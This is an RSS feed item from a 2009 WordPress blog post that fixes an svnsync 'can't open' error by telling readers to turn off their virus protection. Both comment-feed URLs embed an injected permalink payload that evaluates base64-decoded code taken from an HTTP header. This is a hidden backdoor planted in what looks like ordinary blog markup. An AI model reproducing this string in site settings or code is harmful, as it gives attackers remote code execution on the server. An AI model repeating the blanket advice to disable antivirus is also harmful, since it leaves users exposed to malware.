		<comments>http://gregjessup.com/2009/05/28/svnsync-cant-open-cdocume1-error/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments</comments>
		<pubDate>Thu, 28 May 2009 20:37:01 +0000</pubDate>
		<dc:creator>Greg</dc:creator>
		
		<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://gregjessup.com/svnsync-cant-open-cdocume1-error/</guid>
		<description><![CDATA[I had this very annoying error the other day when trying to sync my repositories. The answer was so simple, but took me forever to figure out, as some files would sync and some would fail. 
The answer….
Turn off your Virus Protection! That’s it!  
Hope it helps you out.
]]></description>
			<content:encoded><![CDATA[<p>I had this very annoying error the other day when trying to sync my repositories. The answer was so simple, but took me forever to figure out, as some files would sync and some would fail. </p>
<p>The answer….</p>
<p><strong>Turn off your Virus Protection!</strong> That’s it! <img src='http://gregjessup.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Hope it helps you out.</p>
]]></content:encoded>
			<wfw:commentRss>http://gregjessup.com/2009/05/28/svnsync-cant-open-cdocume1-error/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>

